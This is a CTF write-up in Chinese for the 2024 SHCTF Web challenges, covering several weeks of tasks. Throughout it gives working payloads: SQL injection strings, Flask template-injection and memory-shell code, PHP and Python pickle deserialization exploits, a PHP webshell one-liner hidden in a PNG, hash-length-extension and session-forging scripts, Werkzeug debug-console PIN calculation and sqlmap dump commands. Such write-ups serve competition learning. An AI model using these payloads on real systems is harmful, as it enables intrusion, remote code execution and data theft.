2024-SHCTF Web WP

[Week1] 1zflask

按照提示访问 robots.txt，访问 /s3recttt 得到一个 python 文件

在 api 路由传参，直接执行命令得到 flag

@app.route('/api')
def api():
    cmd = request.args.get('SSHCTFF', 'ls /')
    result = os.popen(cmd).read()
    return result

[Week1] MD5 Master

<?php
  highlight_file(__file__);

$master = "MD5 master!";

if(isset($_POST["master1"]) && isset($_POST["master2"])){
  if($master.$_POST["master1"] !== $master.$_POST["master2"] && md5($master.$_POST["master1"]) === md5($master.$_POST["master2"])){
    echo $master . "<br>";
    echo file_get_contents('/flag');
  }
}
else{
  die("master? <br>");
}

md5强碰撞，但是限制了前面一部分的字符串，不能使用现成的payload了，这里使用fastcoll生成

fastcoll_v1.0.0.5.exe -p test.txt -o 1.txt 2.txt

test.txt
MD5 master!

将生成的两个文本文件url编码一下，利用 burp 传参即可

[Week1] ez_gittt

git 泄露，和 basectf 那道几乎一模一样

先使用 githacker 将 .git 目录拉下来，再查看历史命令看到添加 flag 的操作

git checkout 命令恢复到当时的操作，恢复后即可看到 flag

[Week1] jvav

让 AI 写个脚本即可得到 flag

import java.io.BufferedReader;
import java.io.InputStreamReader;

public class demo {
    public static void main(String[] args) {
        try {
            // 创建一个ProcessBuilder对象，指定要执行的命令
            ProcessBuilder processBuilder = new ProcessBuilder("cat", "/flag");

            // 启动进程
            Process process = processBuilder.start();

            // 读取命令的输出
            BufferedReader reader = new BufferedReader(new InputStreamReader(process.getInputStream()));
            String line;
            while ((line = reader.readLine()) != null) {
                System.out.println(line);
            }

            // 等待命令执行完成并获取退出码
            int exitCode = process.waitFor();
            System.out.println("Exit Code: " + exitCode);

        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

[Week1] poppopop

首先反序列的入口都在 __destruct() 魔术方法里

然后链子是 __destruct() -> __toString() -> flag() -> __invoke()

赋值($this->isyou)($this->flag);得到 flag

 <?php
class SH {

    public static $Web = false;
    public static $SHCTF = false;
}
class C {
    public $p;

    public function flag()
    {
        ($this->p)();
    }
}
class T{

    public $n;
    public function __destruct()
    {

        SH::$Web = true;
        echo $this->n;
    }
}
class F {
    public $o;
    public function __toString()
    {
        SH::$SHCTF = true;
        $this->o->flag();
        return "其实。。。。,";
    }
}
class SHCTF {
    public $isyou = "system";
    public $flag = "cat /flllag";
    public function __invoke()
    {
        if (SH::$Web) {

            ($this->isyou)($this->flag);
            echo "小丑竟是我自己呜呜呜~";
        } else {
            echo "小丑别看了!";
        }
    }
}

$payload = new T();
$payload->n = new F();
$payload->n->o = new C();
$payload->n->o->p = new SHCTF();

echo base64_encode(serialize($payload));

# TzoxOiJUIjoxOntzOjE6Im4iO086MToiRiI6MTp7czoxOiJvIjtPOjE6IkMiOjE6e3M6MToicCI7Tzo1OiJTSENURiI6Mjp7czo1OiJpc3lvdSI7czo2OiJzeXN0ZW0iO3M6NDoiZmxhZyI7czoxMToiY2F0IC9mbGxsYWciO319fX0=

[Week1] 单身十八年的手速

翻 js 代码看到当点击次数大于 520 次时弹出一串 base64 ，解码得到 flag

[Week1] 蛐蛐?蛐蛐!

查看源码得到提示，访问得到源码

访问得到页面源码

<?php
  if($_GET['ququ'] == 114514 && strrev($_GET['ququ']) != 415411){
  if($_POST['ququ']!=null){
  $eval_param = $_POST['ququ'];
if(strncmp($eval_param,'ququk1',6)===0){
  eval($_POST['ququ']);
}else{
  echo("可以让fault的蛐蛐变成现实么\n");
}
}
echo("蛐蛐成功第一步！\n");

}
else{
  echo("呜呜呜fault还是要出题");
}

第一层弱比较，使用 114514a 绕过第二层需要传入的字符的前六位是 ququk1 才会执行命令，使用分号绕过进行命令执行，得到 flag

[Week2] guess_the_number

F12 得到源码

发现是伪随机数，给出了生成的第一个数，爆破随机数种子，得到第二个数

@app.route('/first')
def get_first_number():
    return str(first_num)
  
@app.route('/guess')
def verify_seed():
    num = request.args.get('num')
    if num == str(second_num):
        with open("/flag", "r") as file:
            return file.read()
    return "nonono"

脚本如下：

import random

for seed in range(1000000, 9999999):
    random.seed(seed)
    first_num = random.randint(1000000000, 9999999999)
    if first_num == 8650917635:
        print("Seed found:", seed)
        for _ in range(3):
            print(random.randint(1000000000, 9999999999))
        break

# Seed found: 4717769
# 7497985241
# 9607468942
# 9902613818

提交即可得到 flag

[Week2] 自助查询

查询语句已经给出了，按照要求闭合进行注入

注入语句如下：

1") order by 2
1") union select 1,database()
1") union select 1,group_concat(table_name) from information_schema.tables where table_schema="ctf"
1") union select 1,group_concat(column_name) from information_schema.columns where table_name="flag" and table_schema="ctf"
1") union select 1,group_concat(id,scretdata) from ctf.flag

此时你会发现什么都查不到，根据提示查看注释内容，得到 flag

1	1") UNION SELECT 1,group_concat(COLUMN_NAME, COLUMN_COMMENT) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA = 'ctf' AND TABLE_NAME = 'flag'

[Week2] 登录验证

尝试弱口令 admin 回显你不是真正的 admin

查看 jwt 爆破出密钥 222333 伪造 role 为 admin，重新加密

加密后的 jwt 放入 token，刷新即可得到 flag

[Week2] 入侵者禁入

源码如下：

from flask import Flask, session, request, render_template_string

app = Flask(__name__)
app.secret_key = '0day_joker'

@app.route('/')
def index():
    session['role'] = {
        'is_admin': 0,
        'flag': 'your_flag_here'
    }
    with open(__file__, 'r') as file:
        code = file.read()
    return code

@app.route('/admin')
def admin_handler():
    try:
        role = session.get('role')
        if not isinstance(role, dict):
            raise Exception
    except Exception:
        return 'Without you, you are an intruder!'

    if role.get('is_admin') == 1:
        flag = role.get('flag') or 'admin'
        message = "Oh,I believe in you! The flag is: %s" % flag
        return render_template_string(message)
    else:
        return "Error: You don't have the power!"


if __name__ == '__main__':
    app.run('0.0.0.0', port=80)

发现要检验 admin 的值为 1 并且在 flag 处存在模板注入漏洞，先伪造 admin 的值为 1，测试注入漏洞

发现 2*2 被成功解析，于是写入命令执行代码,，注意伪造时 flag 里的单引号需要转义，否则会匹配错误，伪造 payload 如下：

1	python flask_session_cookie_manager3.py encode -s 0day_joker -t "{'role': {'flag': '{{config.__class__.__init__.__globals__[\'os\'].popen(\'cat /flag\').read()}}', 'is_admin': 1}}"

伪造后传入 cookie 得到 flag

[Week2] dickle(复现)

拿到源码，发现过滤了大量的模块

from flask import Flask, request
import pickle
import base64
import io

BLACKLISTED_CLASSES = [
    'subprocess.check_output','builtins.eval','builtins.exec',
    'os.system', 'os.popen', 'os.popen2', 'os.popen3', 'os.popen4', 
    'pickle.load', 'pickle.loads', 'cPickle.load', 'cPickle.loads', 
    'subprocess.call', 'subprocess.check_call', 'subprocess.Popen', 
    'commands.getstatusoutput', 'commands.getoutput', 'commands.getstatus', 
    'pty.spawn', 'posixfile.open', 'posixfile.fileopen',
    '__import__','os.spawn*','sh.Command','imp.load_module','builtins.compile'
    'eval', 'builtins.execfile', 'compile', 'builtins.open', 'builtins.file', 'os.system', 
    'os.fdopen', 'os.tmpfile', 'os.fchmod', 'os.fchown', 'os.open', 'os.openpty', 'os.read', 'os.pipe',
    'os.chdir', 'os.fchdir', 'os.chroot', 'os.chmod', 'os.chown', 'os.link', 'os.lchown', 'os.listdir',
    'os.lstat', 'os.mkfifo', 'os.mknod', 'os.access', 'os.mkdir', 'os.makedirs', 'os.readlink', 'os.remove',
    'os.removedirs', 'os.rename', 'os.renames', 'os.rmdir', 'os.tempnam', 'os.tmpnam', 'os.unlink', 'os.walk',
    'os.execl', 'os.execle', 'os.execlp', 'os.execv', 'os.execve', 'os.dup', 'os.dup2', 'os.execvp', 'os.execvpe',
    'os.fork', 'os.forkpty', 'os.kill', 'os.spawnl', 'os.spawnle', 'os.spawnlp', 'os.spawnlpe', 'os.spawnv',
    'os.spawnve', 'os.spawnvp', 'os.spawnvpe', 'pickle.load', 'pickle.loads', 'cPickle.load', 'cPickle.loads',
    'subprocess.call', 'subprocess.check_call', 'subprocess.check_output', 'subprocess.Popen',
    'commands.getstatusoutput', 'commands.getoutput', 'commands.getstatus', 'glob.glob',
    'linecache.getline', 'shutil.copyfileobj', 'shutil.copyfile', 'shutil.copy', 'shutil.copy2', 'shutil.move',
    'shutil.make_archive', 'popen2.popen2', 'popen2.popen3', 'popen2.popen4', 'timeit.timeit', 'sys.call_tracing',
    'code.interact', 'code.compile_command', 'codeop.compile_command', 'pty.spawn', 'posixfile.open',
    'posixfile.fileopen'
]

class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if f"{module}.{name}" in BLACKLISTED_CLASSES:
            raise pickle.UnpicklingError("Forbidden class: %s.%s" % (module, name))
        return super().find_class(module, name)

app = Flask(__name__)

@app.route("/", methods=["GET", "POST"])
def index():
    if request.method == "POST":
        encoded_data = request.form["data"]
        decoded_data = base64.b64decode(encoded_data)
    
        try:
            data_stream = io.BytesIO(decoded_data)
            unpickler = SafeUnpickler(data_stream)
            result = unpickler.load()
            return f"Deserialized data: {list(result)}"
        except Exception as e:
            return f"Error during deserialization: {str(e)}"
    else:
        return """
        <form method="post">
            <label for="data">Enter your serialized data:</label><br>
            <textarea id="data" name="data"></textarea><br>
            <input type="submit" value="Submit">
        </form>
        """

if __name__ == "__main__":
    app.run(port=8080)

找到一些没有过滤的命令执行函数使用

import subprocess
import inspect

def list_module_methods(module):    # 列出subprocess模块下所有函数
    methods = [name for name, func in inspect.getmembers(module, predicate=inspect.isfunction)]
    return methods

subprocess_methods = list_module_methods(subprocess)

BLACKLISTED_CLASSES = []  # 黑名单略----------------------------------------

for method in subprocess_methods:
    methodTmp = f"subprocess.{method}"
    if methodTmp not in BLACKLISTED_CLASSES:
        print(method)
'''
输出:
_args_from_interpreter_flags
_cleanup
_optim_args_from_interpreter_flags
_text_encoding
_use_posix_spawn
getoutput
getstatusoutput
list2cmdline
run
'''

发现getoutput没有被过滤，使用它进行命令执行，得到flag

import pickle
import base64
import subprocess

def execute_command(command):
    class Exploit(object):
        def __reduce__(self):
            return (subprocess.getoutput, (command,))

    payload = pickle.dumps(Exploit())
    encoded_payload = base64.b64encode(payload)
    print(encoded_payload.decode())

execute_command('cat /flag')

[Week2] MD5 GOD!

源码如下：

from flask import *
import hashlib, os, random


app = Flask(__name__)
app.config["SECRET_KEY"] = "Th1s_is_5ecr3t_k3y"
salt = os.urandom(16)

def md5(data):
    return hashlib.md5(data).hexdigest().encode()

def check_sign(sign, username, msg, salt):
    if sign == md5(salt + msg + username):
        return True
    return False


def getRandom(str_length=16):
    """
    生成一个指定长度的随机字符串
    """
    random_str =''
    base_str ='ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'
    length =len(base_str) -1
    for i in range(str_length):
        random_str +=base_str[random.randint(0, length)]
    return random_str

users = {}
sign_users = {}

@app.route("/")
def index():
    if session.get('sign') == None or session.get('username') == None or session.get('msg') == None:
        return redirect("/login")
    sign = session.get('sign')
    username = session.get('username')
    msg = session.get('msg')
    if check_sign(sign, username, msg, salt):
        sign_users[username.decode()] = 1
        return "签到成功"
    return redirect("/login")


@app.route("/login", methods=["GET", "POST"])
def login():
    if request.method == "POST":
        username = request.form.get('username')
        password = request.form.get('password')
        # print(password)
        if username in users and users[username] == password:
            session["username"] = username.encode()
            session["msg"] = md5(salt + password.encode())
            session["sign"] = md5(salt + md5(salt + password.encode()) + username.encode())
            return "登陆成功"
        else:
            return "登陆失败"
    else:
        return render_template("login.html")


@app.route("/users")
def user():
    return json.dumps(sign_users)


@app.route("/flag")
def flag():
    for user in users:
        if sign_users[user] != 1:
            return "flag{杂鱼~}"
    return open('/flag', 'r').read()


def init():
    global users, sign_users
    for _ in range(64):
        username = getRandom(8)
        pwd = getRandom(16)
        users[username] = pwd
        sign_users[username] = 0
    users["student"] = "student"
    sign_users["student"] = 0

init()

首先登陆给出的账号密码，查看 session，观察 seesion 格式

访问 users 路由查看到需要登陆的人

这是登陆的核心逻辑，salt 是随机生成的 16 个字符，密码是 salt +16 位 A-Za-z0-9，因为已经有了一个学生账号密码的 md5，想到哈希长度拓展攻击

1
2
3

session["username"] = username.encode()
session["msg"] = md5(salt + password.encode())
session["sign"] = md5(salt + md5(salt + password.encode()) + username.encode())

伪造密码和签名，将伪造的数据再用 session 存储提交

提交签到成功，再次查看 /users 路由发现已经签到成功了

接下来就是改造脚本了，根据原有的 hash 拓展脚本写一个批量处理的脚本，关键代码如下，跑一下即可得到 flag

import requests
import os
from Hashdump import HashExtAttack
import ast
import time

url = 'http://210.44.150.15:31643/'

response = requests.get(url+'users')
dicts = response.text
un = ast.literal_eval(dicts)
print(un)

for i in un:
    hash_ext_attack = HashExtAttack()
    result = hash_ext_attack.input_run('637af2ab008f0cac6a55e9201984c6bfstudent','383da15fd7e7400cf420974001bddeda',i,16)
    msg = result[0][:-8]
    sign = result[1]
    msg_str = repr(msg)
    cmd = "python flask_session_cookie_manager3.py encode -s 'Th1s_is_5ecr3t_k3y' -t \"{'msg': "+msg_str+", 'sign': b'"+sign+"', 'username': b'"+i+"'}\""
    proc = os.popen(cmd)
    output = proc.read()
    proc.close()
    cookie = {
            'session':output[:-1]
    }
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3'
    }
    response = requests.get(url,cookies=cookie, headers=headers)
    print(response.text)


response = requests.get(url+'/flag')
print(response.text)

[Week3] 小小cms

开源 cms，网上找到 RCE 漏洞,搜到现成的 poc，直接打，得到 flag

1	https://github.com/wy876/POC/blob/main/YzmCMS/YzmCMS%E6%8E%A5%E5%8F%A3%E5%AD%98%E5%9C%A8pay_callback%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C.md

[Week3] love_flask

源码如下：

@app.route('/')
def pretty_input():
    return render_template_string(html_template)

@app.route('/namelist', methods=['GET'])
def name_list():
    name = request.args.get('name')  
    template = '<h1>Hi, %s.</h1>' % name
    rendered_string =  render_template_string(template)
    if rendered_string:
        return 'Success Write your name to database'
    else:
        return 'Error'

if __name__ == '__main__':
    app.run(port=8080)

侥幸拿了一血，审计代码，发现是模板渲染，但是没有回显，想到写内存马，如下：

url_for.__globals__['__builtins__']['eval']("app.add_url_rule('/shell', 'shell', lambda :__import__('os').popen(_request_ctx_stack.top.request.args.get('cmd', 'whoami')).read())",{'_request_ctx_stack':url_for.__globals__['_request_ctx_stack'],'app':url_for.__globals__['current_app']})

注意需要进行模板渲染，成功写入

在写入的 shell 路由下通过参数 cmd 执行命令，得到 flag

[Week3] 拜师之旅·番外

文件上传，经测试是二次渲染绕过

网上找脚本生成二次渲染绕过的 png 图片

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
    0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
    0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
    0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
    0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
    0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
    0x60, 0x65, 0x7d, 0x52, 0x9d, 0xad, 0x88, 0xa1,
    0x66, 0x44, 0x50, 0x33);


$img = imagecreatetruecolor(32, 32);

for ($y = 0; $y < sizeof($p); $y += 3) {
    $r = $p[$y];
    $g = $p[$y+1];
    $b = $p[$y+2];
    $color = imagecolorallocate($img, $r, $g, $b);
    imagesetpixel($img, round($y / 3), 0, $color);
}

imagepng($img,'./1.png');

此脚本写入的马如下：

1	<?=$_GET[0]($_POST[1]);?>

依次传入 0 和 1 参数即可进行命令执行，burp 抓包可得到文件里面的回显内容

[Week3] hacked_website(复现)

什么都没有，扫目录得到 www.zip，下载下来是网站源码

放入 D 盾发现第十四行存在后门，连接密码为 SH

访问后门文件提示登陆，但是我在源码里翻找和爆破均无果，看官方 wp 写的是爆破，密码是 qwer1234

虽然长度都一样，但是只有这个经历了两次 302 跳转，并且响应最小，（想不到

连接木马，命令执行，得到 flag

[Week3] 顰(复现)

这题只算出来了 pin，其他的不会了，按照官方的 wp 复现一下

先正常计算 pin 值，为 262-850-657，脚本如下：

address_hex = "8e:c2:fc:b6:90:a1"
print(int(address_hex.replace(":",""),16))

import hashlib
from itertools import chain

probably_public_bits = [
    'root'  # /etc/passwd
    'flask.app',  # 默认值
    'Flask',  # 默认值
    '/usr/local/lib/python3.10/site-packages/flask/app.py'  # 报错得到
]

private_bits = [
    '156968114622625',  # /sys/class/net/eth0/address 十进制
    'd45a88e1-3fe4-4156-9e59-3864587b7c87'
    # 字符串合并：
    # 1./etc/machine-id(docker不用看)
    # /proc/sys/kernel/random/boot_id 有boot-id那就拼接boot-id
    # 2. /proc/self/cgroup
]

# 下面为源码里面抄的，不需要修改
h = hashlib.sha1()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

根据 debug 的描述，需要添加受信任的主机才能正常访问 /console 路由，开启 debug 模块，否则直接访问路由就报错

1	https://werkzeug.palletsprojects.com/en/stable/debug/

修改 host 为 127.0.0.1 允许本地访问

此时出现了填写 pin 框的界面，但是还是不能直接输入，会提示无效

需要本地起一个 demo 看看参数，按照流程访问修改后发现会提示有几个参数

from flask import Flask
app = Flask(name)
@app.route("/")
def hello():
    return 'test'
if name == "main":
    app.run(host="0.0.0.0", port=8088, debug=True)

# /console?debugger=yes&cmd=pinauth&pin=531-465-652&s=0NrB2mqZqEoBViwg43DE

回到本题，s 参数就是源码给的 SECRET，pin 就是计算出来的 pin，其余参数不用变

访问可以看到 auth 为 true，也就是身份认证成功

1	/console?__debugger__=yes&cmd=pinauth&pin=262-850-657&s=2Fp0F08Whs4ZUx5iVfRg

接下来获取 cookie，然后将 cookie 填入请求头，发起请求进行命令执行,得到 flag

1
2
3

?__debugger__=yes&cmd=open('/flag').read()&frm=0&pin=262-850-657&s=2Fp0F08Whs4ZUx5iVfRg

Cookie: __wzd80daa8eeb619ef5f617f=1729835051|cae46a0790d2

week4 打不动了，太难了，估计也不会复现了，就到这里吧

[Week4] 0进制计算器

源码如下：

from flask import Flask, render_template, request, jsonify

app = Flask(__name__)

@app.route('/')
def home():
    return render_template('index.html')

@app.route('/execute', methods=['POST'])
def execute_code():
    data = request.json
    code = data.get('code', '')
    output = executer(code)
    return output

from contextlib import redirect_stdout
from io import StringIO

class StupidInterpreter:
    def __init__(self):
        self.variables = {}

    def interpret(self, code):
        if self.checker(code) == False:
            print("有脏东西！")
            return("")
        commands = code.split(';')
        for command in commands:
            command = command.strip()
            if command:
                self.execute_command(command)

    def execute_command(self, command):
        if '=' in command:
            variable, expression = command.split('=', 1)
            variable = variable.strip()
            result = self.evaluate_expression(expression.strip())
            self.variables[variable] = result
        #执行打印操作
        elif command.startswith('cdhor(') and command.endswith(')'):
            expression = command[6:-1].strip()
            result = self.evaluate_expression(expression)
            print(result)
        else:
            print(f"未知指令: {command}")
            return("")
    def evaluate_expression(self, expression):
        for var, value in self.variables.items():
            expression = expression.replace(var, str(value))
        try:
            return eval(expression, {}, {})
        except Exception as e:
            print(f"执行出错: {e}")
            return None

    def checker(self, string):
        try:
            string.encode("ascii")
        except UnicodeEncodeError:
            return False
        allow_chr = '0cdhor+-*/=()"\'; '
        for char in string:
            if char not in allow_chr:
                return False

def executer(code):
    outputIO = StringIO()
    interpreter = StupidInterpreter()
    with redirect_stdout(outputIO):
        interpreter.interpret(code)
    output = outputIO.getvalue()
    return(output)

if __name__ == '__main__':
    app.run(debug=False)

看正则部分，这是运行通过的字符，发现允许的字符恰好可以组成chr 和 ord，可以利用chr 和 ord 来计算

1	allow_chr = '0cdhor+-*/=()"\'; '

eval可以执行的一是”=”号右侧的部分，二是cdhor()内的部分

“=”号右侧的部分执行逻辑如下：

按照等号分隔后执行右侧部分

if '=' in command:
    variable, expression = command.split('=', 1)
    variable = variable.strip()
    result = self.evaluate_expression(expression.strip())
    self.variables[variable] = result

cdhor()部分执行逻辑如下：

匹配 cdhor() 里的字符并执行

elif command.startswith('cdhor(') and command.endswith(')'):
    expression = command[6:-1].strip()
    result = self.evaluate_expression(expression)
    print(result)

chr(ord())形式的代码可以在等号右侧被转换为需要执行的代码后，再经过cdhor()执行并输出结果

脚本如下：

def generate_char(char):
    char_ascii_bin = str(bin(ord(char)))
    result = []
    index = len(char_ascii_bin) - 1
    for a in char_ascii_bin:
        if index == 0 and a == "1":
            result.append("(ord('*')-ord(')'))")
            break
        if index != 0 and a == "1":
            mid_res = ["(ord('*')-ord('('))" for i in range(index)]
            result.append("*".join(mid_res))
        index -= 1
    return("+".join(result))

def generate_sentence(string):
    char_expressions = ["chr(" + generate_char(char) + ")" for char in string]
    sentence_expression = "+".join(char_expressions)
    return(sentence_expression)

# 定义字符串
sentence = """__import__('os').popen('ls').read()"""

# 生成表达式
generated_expression = generate_sentence(sentence)

# 打印生成的表达式
print("Generated Expression:")
print(generated_expression)

结果太长了就不贴了，将生成的 payload 赋值给变量 c，然后将 c 传入 cdhor() 里再次执行，得到 flag

[Week4] 可恶的骗子

靶机直接打开重定向到百度了，扫一下目录

靶机地址拼接图片上的链接，然后伪造一个手机端的 UA 头，打开可以看到一个 sql 注入报错页面

1	Mozilla/5.0 (Linux; Android 12; Pixel 6 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36

使用 sqlmap 进行 sql 注入，先爆出所有数据库

python sqlmap.py -u 210.44.150.15:24854//Xianyu_goods/index.php?ClickID=161 --user-agent='Mozilla/5.0 (Linux; Android 12; Pixel 6 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36' -D root -T admin_user --dump

然后依次爆，最后查到 admin 账户的密码

python sqlmap.py -u http://210.44.150.15:36930/Xianyu_goods/index.php?ClickID=161 --user-agent='Mozilla/5.0 (Linux; Android 12; Pixel 6 Pro) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.196 Mobile Safari/537.36' -D root -T admin_user --dump